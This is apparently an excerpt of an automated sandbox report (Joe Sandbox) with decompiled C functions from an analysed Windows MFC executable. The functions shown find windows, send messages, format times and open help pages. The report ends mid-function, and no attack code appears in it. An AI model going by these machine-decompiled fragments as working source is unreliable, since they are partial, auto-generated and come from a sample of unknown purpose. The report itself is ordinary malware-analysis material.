    • Instruction Fuzzy Hash: DCD0A9B2202320ABEA113730FC0AF4A3A38AB89700F02016AB245AA0F18BA428405A4C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040DCDC(void* __ecx) {
    				int _v8;
    				int _v12;
    				signed int _v16;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				void* _v32;
    				int _t16;
    				int* _t24;
    
    				_t16 =  *(__ecx + 0x488);
    				if(_t16 >= 0 && _t16 <  *((intOrPtr*)(__ecx + 0x47c))) {
    					_t24 =  *( *((intOrPtr*)(__ecx + 0x478)) + _t16 * 4);
    					if(_t24 != 0) {
    						_t16 =  *_t24;
    						if(_t16 != 0) {
    							_t16 = IsWindow( *(_t16 + 0x20));
    							if(_t16 != 0) {
    								_v16 = _v16 & 0x00000000;
    								_v12 = 0;
    								_v32 = 0x1c;
    								_v28 = 1;
    								_v24 = 0x75;
    								_v8 = 0;
    								return SendMessageA( *( *_t24 + 0x20), 0x53, 0,  &_v32);
    							}
    						}
    					}
    				}
    				return _t16;
    			}











    0x0040dce2
    0x0040dceb
    0x0040dcfb
    0x0040dd00
    0x0040dd02
    0x0040dd06
    0x0040dd0b
    0x0040dd13
    0x0040dd15
    0x0040dd1b
    0x0040dd29
    0x0040dd30
    0x0040dd37
    0x0040dd3e
    0x00000000
    0x0040dd44
    0x0040dd13
    0x0040dd06
    0x0040dd00
    0x0040dd4c

    APIs
    • IsWindow.USER32(?), ref: 0040DD0B
    • SendMessageA.USER32(?,00000053,00000000,?), ref: 0040DD44
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: MessageSendWindow
    • String ID: u
    • API String ID: 701072176-4067256894
    • Opcode ID: b2528fd4eaa4c6d52b03cd6f1c48629be14ddd3c355088a85557198f9fb0599b
    • Instruction ID: b2284669d54d0faeb26d38785c1a03786a20e8f61ae753481eae57300a5d00e6
    • Opcode Fuzzy Hash: b2528fd4eaa4c6d52b03cd6f1c48629be14ddd3c355088a85557198f9fb0599b
    • Instruction Fuzzy Hash: 020128B1D002059FDB10CFA4C849BAA7BB4EF44308F1440BED945AF295DBB6A9068B94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0042549E(void* __ecx) {
    				char _v264;
    				void* __ebp;
    				signed int _t8;
    				intOrPtr _t14;
    
    				if( *((intOrPtr*)(__ecx + 0x17f9)) != 0) {
    					_t14 =  *((intOrPtr*)(__ecx + 0x60));
    					if( *((intOrPtr*)(__ecx + 0x60)) != 0) {
    						E0040F1E4(_t14);
    					}
    				}
    				E0042A660( &_v264, 4, 0);
    				_t8 = ShellExecuteA(0, "open",  &_v264, "nopass", 0, 0);
    				_push(0x20);
    				asm("sbb eax, eax");
    				return  ~_t8;
    			}






    0x004254b0
    0x004254b2
    0x004254b7
    0x004254b9
    0x004254b9
    0x004254b7
    0x004254c8
    0x004254e4
    0x004254ea
    0x004254f0
    0x004254f5

    APIs
    • ShellExecuteA.SHELL32(00000000,open,?,nopass,00000000,00000000), ref: 004254E4
      • Part of subcall function 0040F1E4: __EH_prolog.LIBCMT ref: 0040F1E9
      • Part of subcall function 0040F1E4: #535.MFC42(?), ref: 0040F210
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #535ExecuteH_prologShell
    • String ID: nopass$open
    • API String ID: 847499863-1147687034
    • Opcode ID: 097b36375e06f8279463bb2cbbf4181288fdb59dac216b6b3371f1c765b61e0c
    • Instruction ID: 69c11c08cbcb42144e18f5655e869f2158001c797cbb51c0c4bb0e3c596669fc
    • Opcode Fuzzy Hash: 097b36375e06f8279463bb2cbbf4181288fdb59dac216b6b3371f1c765b61e0c
    • Instruction Fuzzy Hash: 7AF0E5F67442183BD720BAB0ACC6FA6B29C974070DF14007EB7029A5C3E5B95D988268
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040FF68(struct HWND__* _a4, struct HWND__* _a8, CHAR* _a12, CHAR* _a16, CHAR* _a20, CHAR* _a24) {
    				struct HWND__* _t12;
    
    				while(1) {
    					_t12 = FindWindowExA(_a4, _a8, _a12, _a16);
    					if(_t12 == 0) {
    						break;
    					}
    					if(FindWindowExA(_t12, 0, _a20, _a24) != 0) {
    						return _t12;
    					}
    					_a8 = _t12;
    				}
    				return 0;
    			}




    0x0040ff73
    0x0040ff81
    0x0040ff85
    0x00000000
    0x00000000
    0x0040ff94
    0x00000000
    0x0040ff9b
    0x0040ff96
    0x0040ff96
    0x00000000

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: FindWindow
    • String ID: __oxFrame.class__
    • API String ID: 134000473-3739978297
    • Opcode ID: 510b8760e722e30eec7a56350ee2419fc141da483daffc4cfbbf705dacfffff6
    • Instruction ID: bfb9782f09a1b7ea65565c282be97de465c1af69d91dd13f106d9f255517c6b2
    • Opcode Fuzzy Hash: 510b8760e722e30eec7a56350ee2419fc141da483daffc4cfbbf705dacfffff6
    • Instruction Fuzzy Hash: 77E09B3210450ABBCF124F959C00E9B3F69EBC5790F104033FA0496550D675C4226F94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00409D3A(struct HWND__* _a4, struct HWND__** _a8) {
    				char _v36;
    				void* _t9;
    				struct HWND__* _t14;
    
    				_t14 = _a4;
    				GetClassNameA(_t14,  &_v36, 0x1e);
    				if(strcmp( &_v36, "Internet Explorer_Server") != 0) {
    					_t9 = 1;
    					return _t9;
    				}
    				 *_a8 = _t14;
    				return 0;
    			}






    0x00409d41
    0x00409d4b
    0x00409d63
    0x00409d70
    0x00000000
    0x00409d70
    0x00409d68
    0x00000000

    APIs
    Strings
    • Internet Explorer_Server, xrefs: 00409D54
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: ClassNamestrcmp
    • String ID: Internet Explorer_Server
    • API String ID: 2652003534-3686983729
    • Opcode ID: 1ef7f1c3ccf3d3768f933e90645adb6b5392a48d8d3e95e6b19eed47a0a8f269
    • Instruction ID: 05cb03f9829cdf8719c06b74b2eda0b1fbf22a09cda3b6310d7b0a141f02eb87
    • Opcode Fuzzy Hash: 1ef7f1c3ccf3d3768f933e90645adb6b5392a48d8d3e95e6b19eed47a0a8f269
    • Instruction Fuzzy Hash: 1BE0127654411DAADF109AA59C41FDE736CAB09715F100017FD01F71D1F678EA4947A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0040A47C(void* __ecx, intOrPtr _a4, struct HWND__* _a8) {
    				signed int _v8;
    				void* __ebp;
    				struct HWND__* _t7;
    
    				_v8 = _v8 & 0x00000000;
    				_t7 = FindWindowExA(_a8, 0, "RICHCNTLREADONLY", 0);
    				if(_t7 == 0) {
    					_push(0x4550cc);
    					L0043DE26();
    				} else {
    					_push(_t7);
    					_push(_a4);
    					E0040FEA7();
    				}
    				return _a4;
    			}






    0x0040a480
    0x0040a490
    0x0040a498
    0x0040a4aa
    0x0040a4af
    0x0040a49a
    0x0040a49a
    0x0040a49b
    0x0040a49e
    0x0040a4a4
    0x0040a4b8

    APIs
    • FindWindowExA.USER32 ref: 0040A490
    • #537.MFC42(004550CC), ref: 0040A4AF
      • Part of subcall function 0040FEA7: __EH_prolog.LIBCMT ref: 0040FEAC
      • Part of subcall function 0040FEA7: IsWindow.USER32(?), ref: 0040FEC5
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 0040FEDC
      • Part of subcall function 0040FEA7: #823.MFC42(-000000C5), ref: 0040FEEA
      • Part of subcall function 0040FEA7: memset.MSVCRT ref: 0040FEF7
      • Part of subcall function 0040FEA7: SendMessageA.USER32(?,0000000D,-000000CA,?), ref: 0040FF0B
      • Part of subcall function 0040FEA7: #537.MFC42(?), ref: 0040FF13
      • Part of subcall function 0040FEA7: #825.MFC42(?,?), ref: 0040FF1F
      • Part of subcall function 0040FEA7: #535.MFC42(?,?), ref: 0040FF2C
      • Part of subcall function 0040FEA7: #800.MFC42(?,?), ref: 0040FF38
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537MessageSendWindow$#535#800#823#825FindH_prologmemset
    • String ID: RICHCNTLREADONLY
    • API String ID: 1642931188-289952697
    • Opcode ID: a4de1f45fb76e1035bbb455a866f02f501c8462289b3f7a70b62fd3412fb812c
    • Instruction ID: ad741f318e9422aee35d42d8468ba4d84c1e36801fb12fb260db2242d5385764
    • Opcode Fuzzy Hash: a4de1f45fb76e1035bbb455a866f02f501c8462289b3f7a70b62fd3412fb812c
    • Instruction Fuzzy Hash: 21E08031240305FBDB10EF51EC07F5D7764AB11759F20412AB804691D1D7BCE554975D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 65%
    			E0041FF02(void* __eax) {
    				intOrPtr _v4;
    				void* _t6;
    				void* _t9;
    				intOrPtr _t17;
    
    				L0043E1C2();
    				_t6 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 4)))) + 0x7c))();
    				if(_t6 == 0) {
    					return _t6;
    				} else {
    					_t9 = _t6;
    					_push(_t9);
    					_push(_t9);
    					_v4 = _t17;
    					_push("main.htm");
    					L0043DE26();
    					return E00422E3C();
    				}
    			}







    0x0041ff02
    0x0041ff0e
    0x0041ff13
    0x0041ff1c
    0x0041ff15
    0x0041ff15
    0x00421d04
    0x00421d08
    0x00421d0b
    0x00421d0f
    0x00421d14
    0x00421d22
    0x00421d22

    APIs
    • #1168.MFC42 ref: 0041FF02
    • #537.MFC42(main.htm,00000000,?,00000000), ref: 00421D14
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922$#1168#924DesktopH_prologWindow
    • String ID: main.htm
    • API String ID: 2060578353-1955420526
    • Opcode ID: 4b491e887d13ba1897f0a963bd3851120e3828a0f58c56d689532f5fa593ed43
    • Instruction ID: b1125a8baa5846aa7d629f44a5564c70cec28a59c307ad96fafc21ad2bef4885
    • Opcode Fuzzy Hash: 4b491e887d13ba1897f0a963bd3851120e3828a0f58c56d689532f5fa593ed43
    • Instruction Fuzzy Hash: D3E0CD303101106F4B086726E40696F76D5AB88741750516FB006CF3A1DF68EC41939D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E004290DB(void* __ecx, intOrPtr _a4, struct _SYSTEMTIME* _a8) {
    				char* _v8;
    
    				_v8 = 0;
    				 *0x455ae8 = 0;
    				GetTimeFormatA(0x400, 2, _a8, 0, 0x455ae8, 0x32);
    				_push(0x455ae8);
    				L0043DE26();
    				return _a4;
    			}




    APIs
    • GetTimeFormatA.KERNEL32(00000400,00000002,?,00000000,00455AE8,00000032,00000000,?,?,00429D29,?,?,?,?), ref: 004290FD
    • #537.MFC42(00455AE8,?,00429D29,?,?,?,?), ref: 00429107
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537FormatTime
    • String ID: ZE
    • API String ID: 763113566-2731775069
    • Opcode ID: 2236a2860633e400c1b775be719c36affa138c5e74afcec38f29bed0b3fc8e05
    • Instruction ID: ab7ac30e4c100136dd73a2a49a3806999ebe9f100c8948f7f4d17300c57ca34f
    • Opcode Fuzzy Hash: 2236a2860633e400c1b775be719c36affa138c5e74afcec38f29bed0b3fc8e05
    • Instruction Fuzzy Hash: EEE08C74641224BFDB009B54EC46EEA3FACDB49351F008026FE049B282D2B09E0087A8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00421CA8(void* __ecx, void* __eflags) {
    				void* _t12;
    				signed char* _t20;
    				void* _t22;
    
    				E0043E4E0(0x44233f, _t22);
    				E0041892F(_t22 - 0x460, __eflags, 0);
    				 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
    				_t20 = __ecx + 0x274c;
    				 *_t20 = 1;
    				L0043DE7A();
    				 *_t20 =  *_t20 & 0x00000000;
    				 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
    				_t12 = E00418A07(_t22 - 0x460);
    				 *[fs:0x0] =  *((intOrPtr*)(_t22 - 0xc));
    				return _t12;
    			}






    APIs
    • __EH_prolog.LIBCMT ref: 00421CAD
      • Part of subcall function 0041892F: __EH_prolog.LIBCMT ref: 00418934
      • Part of subcall function 0041892F: #324.MFC42(00000097,?), ref: 00418949
      • Part of subcall function 0041892F: CreateSolidBrush.GDI32(00EFEFEF), ref: 004189CB
      • Part of subcall function 0041892F: #1641.MFC42(00000000), ref: 004189D4
    • #2514.MFC42 ref: 00421CDB
      • Part of subcall function 00418A07: __EH_prolog.LIBCMT ref: 00418A0C
      • Part of subcall function 00418A07: #2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A34
      • Part of subcall function 00418A07: #2414.MFC42(?,?,?,?,?,004189F3), ref: 00418A55
      • Part of subcall function 00418A07: #641.MFC42(?,?,?,?,?,004189F3), ref: 00418AE6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: H_prolog$#2414$#1641#2514#324#641BrushCreateSolid
    • String ID: ?#D
    • API String ID: 3775285994-527337815
    • Opcode ID: 248e3db43ed6ac437d73d4ddf80255f6bdad2b72c13312c3a7a4781573dd5173
    • Instruction ID: 50ab66d36ff637021284a782593007f268f4fedbfceec2e6bb398c4016ea0bee
    • Opcode Fuzzy Hash: 248e3db43ed6ac437d73d4ddf80255f6bdad2b72c13312c3a7a4781573dd5173
    • Instruction Fuzzy Hash: FFF0E5B1C101948BD724EB24D9027D8BB74AF2531CF00019EA455221C2AFFD1F44CB4A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0041A80C(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x441404, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_email.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 0041A811
    • #537.MFC42(options_email.htm), ref: 0041A822
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_email.htm
    • API String ID: 4033027120-3085017375
    • Opcode ID: 0439ff43b523b3eb5376d9774da1ba9c1f55e0efe49296d7be024e2c2f852446
    • Instruction ID: 996d0d0aeef533bcf352603fb1248ab4fd8a7f20386e13404718b5d22c090344
    • Opcode Fuzzy Hash: 0439ff43b523b3eb5376d9774da1ba9c1f55e0efe49296d7be024e2c2f852446
    • Instruction Fuzzy Hash: D7D02B71B10200BBCB08BBE6E40376D7B60AB88718F00871FB032972C2CBBC5941461D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0040B837(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x43fd00, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_notification.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
    				_t9 = 1;
    				 *[fs:0x0] =  *((intOrPtr*)(_t15 - 0xc));
    				return _t9;
    			}







    APIs
    • __EH_prolog.LIBCMT ref: 0040B83C
    • #537.MFC42(options_notification.htm), ref: 0040B84D
      • Part of subcall function 00422E3C: __EH_prolog.LIBCMT ref: 00422E41
      • Part of subcall function 00422E3C: #537.MFC42(::/), ref: 00422E56
      • Part of subcall function 00422E3C: #924.MFC42(?,004558C8,bpk.chm,::/), ref: 00422E6F
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E7E
      • Part of subcall function 00422E3C: #922.MFC42(?,00000000,?,?,00000000,00000000,?,004558C8,bpk.chm,::/), ref: 00422E90
      • Part of subcall function 00422E3C: GetDesktopWindow.USER32 ref: 00422E9C
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EAB
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EB7
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EC3
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422ECF
      • Part of subcall function 00422E3C: #800.MFC42 ref: 00422EDB
    Strings
    • options_notification.htm, xrefs: 0040B848
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #800$#537#922H_prolog$#924DesktopWindow
    • String ID: options_notification.htm
    • API String ID: 4033027120-2350321056
    • Opcode ID: 60b506d337661445128c903c75825619301f104fcefe1cf86aa4602ec660b1e1
    • Instruction ID: aa12ae82a729b3d9a5d54cd3a3462a03e7f549519319177819aadfa41fab4b01
    • Opcode Fuzzy Hash: 60b506d337661445128c903c75825619301f104fcefe1cf86aa4602ec660b1e1
    • Instruction Fuzzy Hash: 9DD02BB1F10200B7CB08BBE6A80772D7760AB88718F008B2FB032962C1CBBC5900421D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E0040B949(void* __ecx, void* __esi) {
    				void* _t6;
    				void* _t9;
    				void* _t15;
    				intOrPtr _t17;
    
    				_t6 = E0043E4E0(0x43fd3c, _t15);
    				 *((intOrPtr*)(_t15 - 0x10)) = _t17;
    				_push("options_notification.htm");
    				L0043DE26();
    				 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
    				L004044C9(_t6, _t17, __esi);
    				E00422E3C();
